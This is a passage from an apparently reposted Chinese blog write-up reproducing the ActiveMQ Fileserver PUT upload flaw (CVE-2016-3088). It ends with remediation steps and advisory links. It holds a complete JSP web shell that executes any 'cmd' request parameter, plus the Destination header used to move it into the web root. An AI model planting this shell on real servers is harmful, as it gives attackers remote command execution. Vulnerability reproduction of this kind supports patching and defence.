http://192.168.1.104:8161/admin/test/systemProperties.jsp
<%@ page import="java.io.*"%>
<%
out.print("Hello</br>");
String strcmd=request.getParameter("cmd");
String line=null;
Process p=Runtime.getRuntime().exec(strcmd);
BufferedReader br=new BufferedReader(new InputStreamReader(p.getInputStream()));
while((line=br.readLine())!=null){
out.print(line+"</br>");
}
%>
Destination:file:///opt/activemq/webapps/api/5.jsp
-
1. ActiveMQ Fileserver 的功能在 5.14.0 及其以后的版本中已被移除。建议用户升级至 5.14.0 及其以后版本。 -
2. 通过移除 confjetty.xml 的以下配置来禁用 ActiveMQ Fileserver 功能 -
3. 打补丁
http://activemq.apache.org/security-advisories.data/CVE-2016-3088-announcement.txt
https://www.cnblogs.com/huangxiaosan/p/14222694.html
原文始发于微信公众号(Reset安全):ActiveMQ PUT任意文件上传漏洞复现
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论